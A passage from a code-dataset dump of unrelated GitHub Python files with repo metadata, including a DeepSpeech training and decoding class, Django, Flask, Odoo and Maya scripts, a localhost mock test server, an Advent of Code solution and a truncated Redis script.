learning_rate: float\n :param gradient_clipping: Gradient clipping threshold.\n :type gradient_clipping: float\n :param num_epoch: Number of training epochs.\n :type num_epoch: int\n :param batch_size: Number of batch size.\n :type batch_size: int\n :param num_samples: The num of train samples.\n :type num_samples: int\n :param save_epoch: Number of training iterations for save checkpoint and params.\n :type save_epoch: int\n :param num_iterations_print: Number of training iterations for printing\n a training loss.\n :type num_iteratons_print: int\n :param test_off: Turn off testing.\n :type test_off: bool\n \"\"\"\n # prepare model output directory\n if not os.path.exists(self._output_model_dir):\n mkpath(self._output_model_dir)\n\n # adapt the feeding dict according to the network\n adapted_feeding_dict = self._adapt_feeding_dict(feeding_dict)\n\n if isinstance(self._place, fluid.CUDAPlace):\n dev_count = fluid.core.get_cuda_device_count()\n else:\n dev_count = int(os.environ.get('CPU_NUM', 1))\n\n # prepare the network\n train_program = fluid.Program()\n startup_prog = fluid.Program()\n with fluid.program_guard(train_program, startup_prog):\n with fluid.unique_name.guard():\n train_reader, log_probs, ctc_loss = self.create_network()\n # prepare optimizer\n optimizer = fluid.optimizer.AdamOptimizer(\n learning_rate=fluid.layers.exponential_decay(\n learning_rate=learning_rate,\n decay_steps=num_samples / batch_size / dev_count,\n decay_rate=0.83,\n staircase=True),\n grad_clip=fluid.clip.GradientClipByGlobalNorm(\n clip_norm=gradient_clipping))\n optimizer.minimize(loss=ctc_loss)\n\n test_prog = fluid.Program()\n with fluid.program_guard(test_prog, startup_prog):\n with fluid.unique_name.guard():\n test_reader, _, ctc_loss = self.create_network()\n\n test_prog = test_prog.clone(for_test=True)\n\n exe = fluid.Executor(self._place)\n exe.run(startup_prog)\n\n # init from some pretrain models, to better solve the current task\n pre_epoch = 0\n if self._init_from_pretrained_model:\n pre_epoch = self.init_from_pretrained_model(exe, train_program)\n\n build_strategy = compiler.BuildStrategy()\n exec_strategy = fluid.ExecutionStrategy()\n\n # pass the build_strategy to with_data_parallel API\n compiled_prog = compiler.CompiledProgram(\n train_program).with_data_parallel(\n loss_name=ctc_loss.name,\n build_strategy=build_strategy,\n exec_strategy=exec_strategy)\n\n train_reader.set_batch_generator(train_batch_reader)\n test_reader.set_batch_generator(dev_batch_reader)\n\n # run train \n for epoch_id in range(num_epoch):\n train_reader.start()\n epoch_loss = []\n time_begin = time.time()\n batch_id = 0\n step = 0\n while True:\n try:\n fetch_list = [ctc_loss.name]\n\n if batch_id % num_iterations_print == 0:\n fetch = exe.run(\n program=compiled_prog,\n fetch_list=fetch_list,\n return_numpy=False)\n each_loss = fetch[0]\n epoch_loss.extend(np.array(each_loss[0]) / batch_size)\n\n print(\"epoch: %d, batch: %d, train loss: %f\\n\" %\n (epoch_id, batch_id,\n np.mean(each_loss[0]) / batch_size))\n\n else:\n each_loss = exe.run(\n program=compiled_prog,\n fetch_list=[],\n return_numpy=False)\n\n batch_id = batch_id + 1\n except fluid.core.EOFException:\n train_reader.reset()\n break\n time_end = time.time()\n used_time = time_end - time_begin\n if test_off:\n print(\"\\n--------Time: %f sec, epoch: %d, train loss: %f\\n\" %\n (used_time, epoch_id, np.mean(np.array(epoch_loss))))\n else:\n print('\\n----------Begin test...')\n test_loss = self.test(\n exe,\n dev_batch_reader=dev_batch_reader,\n test_program=test_prog,\n test_reader=test_reader,\n fetch_list=[ctc_loss])\n print(\n \"--------Time: %f sec, epoch: %d, train loss: %f, test loss: %f\"\n % (used_time, epoch_id + pre_epoch,\n np.mean(np.array(epoch_loss)), test_loss / batch_size))\n if (epoch_id + 1) % save_epoch == 0:\n self.save_param(exe, train_program,\n \"epoch_\" + str(epoch_id + pre_epoch))\n\n self.save_param(exe, train_program, \"step_final\")\n\n print(\"\\n------------Training finished!!!-------------\")\n\n def infer_batch_probs(self, infer_data, feeding_dict):\n \"\"\"Infer the prob matrices for a batch of speech utterances.\n :param infer_data: List of utterances to infer, with each utterance\n consisting of a tuple of audio features and\n transcription text (empty string).\n :type infer_data: list\n :param feeding_dict: Feeding is a map of field name and tuple index\n of the data that reader returns.\n :type feeding_dict: dict|list\n :return: List of 2-D probability matrix, and each consists of prob\n vectors for one speech utterancce.\n :rtype: List of matrix\n \"\"\"\n # define inferer\n infer_program = fluid.Program()\n startup_prog = fluid.Program()\n\n # adapt the feeding dict according to the network\n adapted_feeding_dict = self._adapt_feeding_dict(feeding_dict)\n\n # prepare the network\n with fluid.program_guard(infer_program, startup_prog):\n with fluid.unique_name.guard():\n feeder, log_probs, _ = self.create_network(is_infer=True)\n\n infer_program = infer_program.clone(for_test=True)\n exe = fluid.Executor(self._place)\n exe.run(startup_prog)\n\n # init param from pretrained_model\n if not self._init_from_pretrained_model:\n exit(\"No pretrain model file path!\")\n self.init_from_pretrained_model(exe, infer_program)\n\n infer_results = []\n time_begin = time.time()\n\n # run inference\n for i in range(infer_data[0].shape[0]):\n each_log_probs = exe.run(\n program=infer_program,\n feed=feeder.feed(\n [[infer_data[0][i], infer_data[2][i], infer_data[3][i]]]),\n fetch_list=[log_probs],\n return_numpy=False)\n infer_results.extend(np.array(each_log_probs[0]))\n\n # slice result \n infer_results = np.array(infer_results)\n seq_len = (infer_data[2] - 1) // 3 + 1\n\n start_pos = [0] * (infer_data[0].shape[0] + 1)\n for i in range(infer_data[0].shape[0]):\n start_pos[i + 1] = start_pos[i] + seq_len[i][0]\n probs_split = [\n infer_results[start_pos[i]:start_pos[i + 1]]\n for i in range(0, infer_data[0].shape[0])\n ]\n\n return probs_split\n\n def decode_batch_greedy(self, probs_split, vocab_list):\n \"\"\"Decode by best path for a batch of probs matrix input.\n :param probs_split: List of 2-D probability matrix, and each consists\n of prob vectors for one speech utterancce.\n :param probs_split: List of matrix\n :param vocab_list: List of tokens in the vocabulary, for decoding.\n :type vocab_list: list\n :return: List of transcription texts.\n :rtype: List of str\n \"\"\"\n results = []\n for i, probs in enumerate(probs_split):\n output_transcription = ctc_greedy_decoder(\n probs_seq=probs, vocabulary=vocab_list)\n results.append(output_transcription)\n print(results)\n return results\n\n def init_ext_scorer(self, beam_alpha, beam_beta, language_model_path,\n vocab_list):\n \"\"\"Initialize the external scorer.\n :param beam_alpha: Parameter associated with language model.\n :type beam_alpha: float\n :param beam_beta: Parameter associated with word count.\n :type beam_beta: float\n :param language_model_path: Filepath for language model. If it is\n empty, the external scorer will be set to\n None, and the decoding method will be pure\n beam search without scorer.\n :type language_model_path: str|None\n :param vocab_list: List of tokens in the vocabulary, for decoding.\n :type vocab_list: list\n \"\"\"\n if language_model_path != '':\n self.logger.info(\"begin to initialize the external scorer \"\n \"for decoding\")\n self._ext_scorer = Scorer(beam_alpha, beam_beta,\n language_model_path, vocab_list)\n lm_char_based = self._ext_scorer.is_character_based()\n lm_max_order = self._ext_scorer.get_max_order()\n lm_dict_size = self._ext_scorer.get_dict_size()\n self.logger.info(\"language model: \"\n \"is_character_based = %d,\" % lm_char_based +\n \" max_order = %d,\" % lm_max_order +\n \" dict_size = %d\" % lm_dict_size)\n self.logger.info(\"end initializing scorer\")\n else:\n self._ext_scorer = None\n self.logger.info(\"no language model provided, \"\n \"decoding by pure beam search without scorer.\")\n\n def decode_batch_beam_search(self, probs_split, beam_alpha, beam_beta,\n beam_size, cutoff_prob, cutoff_top_n,\n vocab_list, num_processes):\n \"\"\"Decode by beam search for a batch of probs matrix input.\n :param probs_split: List of 2-D probability matrix, and each consists\n of prob vectors for one speech utterancce.\n :param probs_split: List of matrix\n :param beam_alpha: Parameter associated with language model.\n :type beam_alpha: float\n :param beam_beta: Parameter associated with word count.\n :type beam_beta: float\n :param beam_size: Width for Beam search.\n :type beam_size: int\n :param cutoff_prob: Cutoff probability in pruning,\n default 1.0, no pruning.\n :type cutoff_prob: float\n :param cutoff_top_n: Cutoff number in pruning, only top cutoff_top_n\n characters with highest probs in vocabulary will be\n used in beam search, default 40.\n :type cutoff_top_n: int\n :param vocab_list: List of tokens in the vocabulary, for decoding.\n :type vocab_list: list\n :param num_processes: Number of processes (CPU) for decoder.\n :type num_processes: int\n :return: List of transcription texts.\n :rtype: List of str\n \"\"\"\n if self._ext_scorer != None:\n self._ext_scorer.reset_params(beam_alpha, beam_beta)\n # beam search decode\n num_processes = min(num_processes, len(probs_split))\n beam_search_results = ctc_beam_search_decoder_batch(\n probs_split=probs_split,\n vocabulary=vocab_list,\n beam_size=beam_size,\n num_processes=num_processes,\n ext_scoring_func=self._ext_scorer,\n cutoff_prob=cutoff_prob,\n cutoff_top_n=cutoff_top_n)\n\n results = [result[0][1] for result in beam_search_results]\n return results\n\n def _adapt_feeding_dict(self, feeding_dict):\n \"\"\"Adapt feeding dict according to network struct.\n\n To remove impacts from padding part, we add scale_sub_region layer and\n sub_seq layer. For sub_seq layer, 'sequence_offset' and\n 'sequence_length' fields are appended. For each scale_sub_region layer\n 'convN_index_range' field is appended.\n\n :param feeding_dict: Feeding is a map of field name and tuple index\n of the data that reader returns.\n :type feeding_dict: dict|list\n :return: Adapted feeding dict.\n :rtype: dict|list\n \"\"\"\n adapted_feeding_dict = copy.deepcopy(feeding_dict)\n if isinstance(feeding_dict, dict):\n adapted_feeding_dict[\"sequence_offset\"] = len(adapted_feeding_dict)\n adapted_feeding_dict[\"sequence_length\"] = len(adapted_feeding_dict)\n for i in range(self._num_conv_layers):\n adapted_feeding_dict[\"conv%d_index_range\" %i] = \\\n len(adapted_feeding_dict)\n elif isinstance(feeding_dict, list):\n adapted_feeding_dict.append(\"sequence_offset\")\n adapted_feeding_dict.append(\"sequence_length\")\n for i in range(self._num_conv_layers):\n adapted_feeding_dict.append(\"conv%d_index_range\" % i)\n else:\n raise ValueError(\"Type of feeding_dict is %s, not supported.\" %\n type(feeding_dict))\n\n return adapted_feeding_dict\n","repo_name":"RoBorregos/robocup-home","sub_path":"catkin_home/src/action_selectors/scripts/DeepSpeech/model_utils/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":22640,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"2666719149","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^login$', views.user_login),\n url(r'^logout$', views.user_logout),\n url(r'^signup$', views.signup),\n url(r'^account$', views.account),\n url(r'^statistics$', views.statistics),\n]","repo_name":"andresf01/ProyectoDS2","sub_path":"apps/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3904057283","text":"import maya.cmds as cmds\n\ndef Color():\n sels = cmds.ls(selection=True)\n \n for sel in sels:\n Col = cmds.color(sels, rgb=(1, 0, 0))\n cmds.curve(Col)\n\nColor()\n\ndef Match():\n sels = cmds.ls(selection=True)\n \n for sel in sels:\n Cir = cmds.circle()\n cmds.parent(Cir, sel)\n Grp = cmds.group(empty=True)\n Grp = cmds.rename(Grp, sel + \"_Grp\")\n Grp = cmds.parent(sel, Grp)\n \n newPos = cmds.xform(sel, q=True, rp=True, ws=True) \n newRot = cmds.xform(sel, q=True, ro=True, ws=True)\n cmds.xform(Grp, t=newPos, ws=True) \n cmds.xform(Grp, ro=newRot, ws=True)\n cmds.xform(Cir, t=newPos, ws=True)\n cmds.xform(Cir, ro=newRot, ws=True) \n \n cmds.rename(sel+\"_Geo\")\n \nMatch()","repo_name":"GraceBelt/DGM-3670_Fall2021","sub_path":"Assignment_Assign Color_Create Control.py","file_name":"Assignment_Assign Color_Create Control.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27666320230","text":"import multiprocessing\nimport os\nimport re\nimport shutil\nimport json\nimport requests\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom .routes import routes\n\nnext_payload = None\nnext_status_code = -1\nnext_path_regex = None\nlast_request = None\n\n\n'''\nBased on the implementation of @tliron\nhttps://gist.github.com/tliron/8e9757180506f25e46d9\n\n'''\n\n\nclass TestHTTPServer(BaseHTTPRequestHandler):\n def __init__(self, *args, **kwargs):\n self.routes = routes\n BaseHTTPRequestHandler.__init__(self, *args, **kwargs)\n\n def do_HEAD(self):\n self.handle_method('HEAD')\n\n def do_GET(self):\n self.handle_method('GET')\n\n def do_POST(self):\n self.handle_method('POST')\n\n def do_PUT(self):\n self.handle_method('PUT')\n\n def do_DELETE(self):\n self.handle_method('DELETE')\n\n def get_route(self):\n for path, route in self.routes.items():\n if re.match(path, self.path):\n return route\n return None\n\n def get_payload(self):\n payload_len = int(self.headers['content-length'])\n payload = self.rfile.read(payload_len)\n payload = json.loads(payload)\n return payload\n\n def check_for_next_response(self):\n global next_status_code\n global next_payload\n global next_path_regex\n global last_request\n\n if self.path == '/set-response':\n payload = self.get_payload()\n next_status_code = payload['status_code']\n next_payload = payload['payload']\n next_path_regex = re.compile(\n payload['path_regex']) if 'path_regex' in payload else None\n self.send_response(200)\n self.end_headers()\n return True\n elif self.path == '/clear-response':\n next_status_code = -1\n next_payload = None\n next_path_regex = None\n self.send_response(200)\n self.end_headers()\n return True\n elif self.path == '/last-request':\n self.send_response(200)\n self.end_headers()\n self.wfile.write(bytes(json.dumps(last_request), 'utf-8'))\n return True\n return False\n\n def handle_method(self, method):\n global next_status_code\n global next_payload\n global last_request\n global next_path_regex\n\n if self.check_for_next_response():\n return\n\n last_request = {\n 'method': method,\n 'path': self.path,\n 'payload': self.get_payload() if self.headers['content-length'] and int(self.headers['content-length']) > 0 else None\n }\n\n if (next_status_code > -1) and (not next_payload is None) and ((next_path_regex is None) or next_path_regex.search(self.path)):\n self.send_response(next_status_code)\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n self.wfile.write(bytes(json.dumps(next_payload), 'utf-8'))\n else:\n route = self.get_route()\n if route is None:\n self.send_response(404)\n self.end_headers()\n self.wfile.write(bytes('Route not found\\n', 'utf-8'))\n else:\n if method == 'HEAD':\n self.send_response(200)\n if 'media_type' in route:\n self.send_header('Content-type', route['media_type'])\n self.end_headers()\n else:\n if 'file' in route:\n if method == 'GET':\n try:\n f = open(os.path.join(here, route['file']))\n try:\n self.send_response(200)\n if 'media_type' in route:\n self.send_header(\n 'Content-type', route['media_type'])\n self.end_headers()\n shutil.copyfileobj(f, self.wfile)\n finally:\n f.close()\n except:\n self.send_response(404)\n self.end_headers()\n self.wfile.write(\n bytes('File not found\\n', 'utf-8')\n )\n else:\n self.send_response(405)\n self.end_headers()\n self.wfile.write(\n bytes('Only GET is supported\\n', 'utf-8')\n )\n else:\n if method in route:\n content = route[method](self)\n if content is not None:\n self.send_response(200)\n if 'media_type' in route:\n self.send_header(\n 'Content-type', route['media_type'])\n self.end_headers()\n if method != 'DELETE':\n self.wfile.write(\n bytes(json.dumps(content), 'utf-8'))\n else:\n self.send_response(404)\n self.end_headers()\n self.wfile.write(bytes('Not found\\n', 'utf-8'))\n else:\n self.send_response(405)\n self.end_headers()\n self.wfile.write(\n bytes(method + ' is not supported\\n', 'utf-8'))\n\n\nserver_address = ('127.0.0.1', 2020)\n\n\ndef start_server():\n httpd = HTTPServer(server_address, TestHTTPServer)\n try:\n httpd.serve_forever()\n except KeyboardInterrupt:\n pass\n httpd.server_close()\n\n\ndef set_next_response(status_code, payload, path_regex=None):\n request = {'status_code': status_code, 'payload': payload}\n if path_regex is not None:\n request['path_regex'] = path_regex\n try:\n response = requests.post(\n url='http://%s:%d/set-response' % server_address,\n json=request\n )\n return response.status_code == 200\n except:\n pass\n\n\ndef clear_next_response():\n try:\n response = requests.post(\n url='http://%s:%d/clear-response' % server_address\n )\n return response.status_code == 200\n except:\n pass\n\n\ndef get_last_request():\n try:\n response = requests.get(\n url='http://%s:%d/last-request' % server_address\n )\n return response.json()\n except:\n pass\n\n\n_process = None\n\n\ndef start():\n _process = multiprocessing.Process(target=start_server, args=())\n _process.daemon = True\n _process.start()\n\n\ndef stop():\n if not _process is None:\n _process.stop()\n","repo_name":"quickdata-team/panamah-sdk-python","sub_path":"tests/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16285263852","text":"from flask_wtf import FlaskForm\nfrom flask import Blueprint, request, render_template, flash, redirect, session\nfrom flask_login import login_required, current_user\nfrom app import CONFIG\nfrom . import web_module as mod_web\nfrom . import controllers as controller\nfrom .forms import *\nfrom .models import *\nimport json\nimport requests\n\ntagColors = {\n\t\"Music\": \"CornflowerBlue\",\n\t\"Dance\": \"IndianRed\",\n\t\"Lecture\": \"purple\",\n\t\"Theater\": \"green\",\n\t\"Street\": \"gray\",\n\t\"Orientation\": \"orange\"\n}\n\n# Homepage\n@mod_web.route('/')\ndef home():\n\t# User is not logged in.\n\tif not current_user.is_authenticated and \"guest_mode\" not in session:\n\t\treturn redirect(\"/welcome\")\n\treturn redirect(\"/browse\")\n\t\n# Splash page\n@mod_web.route('/welcome')\ndef welcome():\n\tif \"proceed\" in request.args:\n\t\tsession[\"guest_mode\"] = True\n\t\treturn redirect(\"/browse\")\n\treturn render_template(\"web/splashpage.html\")\n\n@mod_web.route('/browse', methods=['GET', 'POST'])\ndef browser():\n\tif request.method == \"POST\":\n\t\tform = ReportForm(request.form)\n\n\t\tif \"category\" not in request.form:\n\t\t\tflash(\"Error: Reason cannot be empty.\")\n\t\t\treturn render_template(\"web/browser.html\", formR=ReportForm(), wasError=True)\n\t\t\n\t\teventData = {\"reason\": request.form[\"category\"] + \": \" + request.form[\"description\"]}\n\t\theaders = { \"Authorization\" : \"Token %s\" % current_user.token }\n\t\tr = requests.put(CONFIG[\"BASE_URL\"]+\"/api/event/report/\" + request.form['event_id'], \n\t\t\tjson = eventData, headers = headers)\n\t\tr = json.loads(r.text)\n\t\tif r[\"status\"] == \"Success\":\n\t\t\tflash(\"The event has successfully been reported.\")\n\t\t\treturn render_template(\"web/browser.html\", formR=ReportForm())\n\t\telse:\n\t\t\tflash(\"Error in reporting event: \" + r[\"error_msg\"])\n\t\t\treturn render_template(\"web/browser.html\", formR=ReportForm(), wasError=True)\n\n\tif \"USE_MOCK_DATA\" in CONFIG and CONFIG[\"USE_MOCK_DATA\"]:\n\t\t# Ignore USE_MOCK_DATA flag if not in DEBUG mode.\n\t\tif CONFIG[\"DEBUG\"]:\n\t\t\twith open('app/static/mock_data/data.json', 'r') as f:\n\t\t\t\tdata = json.load(f)\n\t\t\t\treturn render_template(\"web/browser.html\", data = data)\n\t\t\tprint(\"Error loading mock data.\")\n\treturn render_template(\"web/browser.html\", formR=ReportForm())\n\t\n@mod_web.route('/myevents', methods=['GET', 'POST'])\ndef myevents():\n\tif request.method == \"POST\":\n\t\tform = EventForm(request.form)\n\n\t\tif not form.validate_on_submit():\n\t\t\tprint(form.errors)\n\t\t\treturn render_template(\"web/myevents.html\", form=form, errors=form.errors, display=True)\n\t\telse:\n\t\t\teventData, numShowings = controller.form_to_event_object(form)\n\n\t\t\ttry:\n\t\t\t\tif \"poster\" in request.files:\n\t\t\t\t\t# Upload image to S3.\n\t\t\t\t\tfile_url = controller.upload_file(request.form['event_id'], request.files[\"poster\"])\n\t\t\t\t\t# Update event with image URL.\n\t\t\t\t\t\n\t\t\t\t\teventData[\"poster\"] = file_url\n\t\t\texcept Exception as e:\n\t\t\t\tflash(\"Error: \" + str(e))\n\t\t\t\treturn render_template(\"web/myevents.html\", form=EventForm())\n\n\t\t\t# make API request\n\t\t\tevent_id = request.form['event_id']\n\t\t\tr = controller.make_edit_request(event_id, eventData)\n\t\t\t\n\t\t\tif r.status_code != 200:\n\t\t\t\tflash(\"Something went wrong. Please contact a developer.\")\n\t\t\t\treturn render_template(\"web/myevents.html\", form=EventForm())\n \n\t\t\tr = json.loads(r.text)\n\t\t\tif r[\"status\"] == \"Success\":\n\t\t\t\tflash(\"Success! Your event has been edited.\")\n\t\t\t\treturn redirect(\"/myevents?event=%s\" % event_id)\n\t\t\telse:\n\t\t\t\tflash(\"Error. \" + r[\"error_msg\"])\n\t\t\t\treturn render_template(\"web/myevents.html\", form=EventForm(), display=True, numRows=numShowings)\n\telse:\n\t\treturn render_template(\"web/myevents.html\", form=EventForm(), display=False, numRows=1)\n\n@mod_web.route('/add', methods=['GET', 'POST'])\n@login_required\ndef addEvent():\n\tif request.method == \"POST\":\n\t\tform = EventForm(request.form)\n\t\tif not form.validate_on_submit():\n\t\t\treturn render_template(\"web/add.html\", form=form, errors=form.errors, wereErrors=True)\n\t\telse:\n\t\t\teventData, numShowings = controller.form_to_event_object(form)\n\t\t\t\n\t\t\t# make API request\n\t\t\theaders = { \"Authorization\" : \"Token %s\" % current_user.token }\n\t\t\tr = requests.put(CONFIG[\"BASE_URL\"]+\"/api/event/add\", \n\t\t\t\tjson = eventData, headers = headers)\n\n\t\t\tif r.status_code != 200:\n\t\t\t\tflash(\"Error: something went wrong. Please contact a developer.\")\n\t\t\t\treturn render_template(\"web/add.html\", form=EventForm(), numRows=numShowings, wereErrors=True)\n\t\t\tr = json.loads(r.text)\n\t\t\tif r[\"status\"] == \"Success\":\n\t\t\t\tevent_id = r[\"data\"][\"id\"]\n\t\t\t\t# If event was successfully added, upload poster & update event.\n\t\t\t\ttry:\n\t\t\t\t\tif \"poster\" in request.files:\n\t\t\t\t\t\t# Upload image to S3.\n\t\t\t\t\t\tfile_url = controller.upload_file(event_id, request.files[\"poster\"])\n\t\t\t\t\t\t# Update event with image URL.\n\t\t\t\t\t\t\n\t\t\t\t\t\t# TODO: Handle failures better (or at all).\n\t\t\t\t\t\tcontroller.make_edit_request(event_id, {'poster': file_url})\n\t\t\t\texcept Exception as e:\n\t\t\t\t\t# If adding the image fail, delete the event and pretend like\n\t\t\t\t\t# nothing happened.\n\t\t\t\t\tcontroller.make_delete_request(event_id)\n\t\t\t\t\tflash(\"Error. \" + str(e))\n\t\t\t\t\treturn render_template(\"web/add.html\", form=EventForm(), numRows=numShowings, wereErrors=True)\n\n\t\t\t\tflash(\"Success! Your event has been added.\")\n\t\t\t\treturn redirect(\"/myevents?event=\"+event_id)\n\t\t\telse:\n\t\t\t\tflash(\"Error. \" + r[\"error_msg\"])\n\t\t\t\treturn render_template(\"web/add.html\", form=EventForm(), numRows=numShowings, wereErrors=True)\n\telse:\n\t\treturn render_template(\"web/add.html\", form=EventForm(), numRows=1)\n\t\t\n@mod_web.route('/about', methods=['GET', 'POST'])\ndef about():\n\tif request.method == \"POST\":\n\t\tform = FeedbackForm(request.form)\n\t\teventData = {\"feedback\": request.form[\"feedback\"]}\n\t\tr = requests.put(CONFIG[\"BASE_URL\"]+\"/api/feedback/\", json = eventData)\n\t\tif r.status_code != 200:\n\t\t\t\tflash(\"Error: something went wrong. Please contact a developer.\")\n\t\t\t\treturn render_template(\"web/about.html\", formF=FeedbackForm())\n\t\tr = json.loads(r.text)\n\t\tif r[\"status\"] == \"Success\":\n\t\t\tflash(\"Thank you! Your feedback has been reported.\")\n\t\t\treturn redirect(\"about\")\n\t\telse:\n\t\t\tflash(\"Error in reporting feedback: \" + r[\"error_msg\"])\n\t\t\treturn render_template(\"web/about.html\", formF=FeedbackForm())\n\n\treturn render_template(\"web/about.html\", formF=FeedbackForm())\n\n","repo_name":"JackNeus/lampPost","sub_path":"app/mod_web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13648563509","text":"from flask import Flask, jsonify, request\r\nimport csv\r\nfrom storage import all_articles, liked_articles, unliked_articles\r\nfrom demographic_filtering import output \r\nfrom content_filtering import get_recommendations\r\nwith open('articles.csv',encoding = 'utf-8') as f:\r\n reader = csv.reader(f)\r\n data = list(reader)\r\n all_articles = data[1:]\r\nliked_articles = []\r\nunliked_articles = []\r\napp = Flask(__name__)\r\n@app.route('/get-article',methods = ['GET'])\r\ndef get_article():\r\n return jsonify({\r\n 'data':all_articles[0],\r\n 'status':'success'\r\n })\r\n@app.route('/liked-article',methods = ['POST'])\r\ndef liked_article():\r\n article = all_articles[0]\r\n all_articles = all_articles[1:]\r\n liked_articles.append(article)\r\n return jsonify({\r\n 'status':'success'\r\n }),201\r\n@app.route('/unliked-article',methods = ['POST'])\r\ndef unliked_article():\r\n article = all_articles[0]\r\n all_articles = all_articles[1:]\r\n unliked_articles.append(article)\r\n return jsonify({\r\n 'status':'success'\r\n }),201\r\n@app.route(\"/popular-article\",methods = ['GET'])\r\ndef popular_article(): \r\n article_data = [] \r\n for article in output: \r\n _d = { \r\n 'total_events':article[0] }\r\n article_data.append(_d) \r\n return jsonify({ \"data\": article_data, \"status\": \"success\" }), 200\r\nif __name__ == '__main__':\r\n app.run()","repo_name":"HridyanshSangal/Project142","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16903802391","text":"# -*- coding: utf-8 -*-\nfrom odoo import api, fields, models\n\nclass PartnerCategory(models.Model):\n _inherit = 'res.partner.category'\n\n @api.model\n def get_tagnames_of_partner (self, partner = 0):\n\n return list(map(lambda x: {\n 'value': x.id,\n 'text': x.name,\n 'assign': partner in x.partner_ids.ids\n } , self.env['res.partner.category'].sudo().search([('active', '=', True)])))\n\nclass ResPartner(models.Model):\n _inherit = 'res.partner'\n\n\n @api.model\n def create_from_ui(self, partner):\n partner_id = super(ResPartner, self).create_from_ui(partner)\n\n cat_list = [] if not partner['category_id'] else [int(x) for x in partner['category_id'].split(',')]\n \n self.browse(partner_id).write({'category_id': [(6, 0, cat_list)]})\n\n return partner_id","repo_name":"youngcut/odoo","sub_path":"pos_tags/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12458711892","text":"import sys\nimport numpy as np\nfrom scipy.ndimage import generic_filter\nfrom copy import deepcopy\nimport itertools\nimport math\n\nfile = sys.argv[1] if len(sys.argv) > 1 else \"ex1\"\nlines = list(map(lambda l: l.rstrip(), open(file + \".txt\").readlines()))\n\n# ----------------------------------------------------------------------\n# * Parsing(/setup)\n\nschematic = np.mat([list(line) for line in lines])\n\n# ----------------------------------------------------------------------\n# * Part 1\n\n\ndef map_symbol(c: str):\n if c == '.':\n return -20\n elif c.isdigit():\n return -int(c) - 1\n else:\n return -30\n\n\ndef grow(region):\n mask = np.ma.masked_where(region == -30, region).mask\n if mask.sum() >= 1 and region[4] in range(-10, 0):\n return -region[4] - 1\n if region[4] in range(-10, 0) and (region[3] in range(0, 10) or region[5] in range(0, 10)):\n return -region[4] - 1\n return region[4]\n\n\ndef cleanup(x: int):\n if x in range(0, 10):\n return str(x)\n else:\n return '.'\n\n\ndef find_nums(schematic):\n old = schematic\n new = generic_filter(schematic, grow, size=3)\n while not np.array_equal(old, new):\n old = new\n new = generic_filter(old, grow, size=3)\n nums = np.vectorize(cleanup)(new)\n nums = [[int(num) for num in \"\".join(line).split('.') if num != \"\"]\n for line in nums]\n return list(itertools.chain(*nums))\n\n\nmapped = np.vectorize(map_symbol)(schematic)\ntotal = sum(find_nums(mapped))\n\nprint(\"Part 1: \" + str(total))\n\n# ----------------------------------------------------------------------\n# * Part 2\n\n\ndef map_gear(c: str):\n if c.isdigit():\n return -int(c) - 1\n else:\n return -20\n\n\ntotal = 0\nmapped = np.vectorize(map_gear)(schematic)\nfor [r, c] in np.argwhere(schematic == '*'):\n m = deepcopy(mapped)\n m[r, c] = -30\n rows = []\n if r != 0:\n rows.append(r-1)\n rows.append(r)\n if r != schematic.shape[0] - 1:\n rows.append(r + 1)\n m = m[rows, :]\n nums = find_nums(m)\n if len(nums) == 2:\n gear_ratio = math.prod(nums)\n total += gear_ratio\n\n\nprint(\"Part 2: \" + str(total))\n","repo_name":"U32Float/AoC","sub_path":"2023/day3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2938298861","text":"import os\nimport time\nimport logging\n\nfrom flask import Flask\n\napp = Flask(__name__)\n\n\ndef some_heavy_task():\n logging.warning(\"Start heavy task!!\")\n time.sleep(5)\n logging.warning(\"Finish heavy task!!\")\n\n\n@app.route(\"/\")\ndef hello_world():\n some_heavy_task()\n name = os.environ.get(\"NAME\", \"World\")\n return \"Hello {}!\".format(name)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, host=\"0.0.0.0\", port=int(os.environ.get(\"PORT\", 8080)))\n","repo_name":"8mamo10/torres","sub_path":"app/python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17794141424","text":" # -*- coding: utf-8 -*-\nimport redis\n\nredis_host = \"localhost\"\nredis_port = 6379\n#Connect with database\nr = redis.StrictRedis(host=redis_host, port=redis_port,\n db = 0, decode_responses=True)\n#Test connection to database\ndef test_connection_database():\n try:\n \n r.hmset(\"msg\",\"Hello\")\n \n msg= r.hmget(\"msg\")\n print(msg)\n except Exception as e:\n print(e)\n\n#Create the appels with certains properties\ndef create_appels():\n try:\n appel1 = {\"id\":\"1\",\"heure\":\"3:54\",\"numero_origine\":\"0749048614\",\"statut\":\"Non affecte\", \"duree\":\"1:40\", \"operateur_id\":\"2\", \"description\":\"Appel domiciliare\"}\n appel2 = {\"id\":\"2\",\"heure\":\"2:39\",\"numero_origine\":\"0649048814\",\"statut\":\"Non pris en compte\", \"duree\":\"1:59\", \"operateur_id\":\"1\", \"description\":\"Appel formelle\"}\n appel3 = 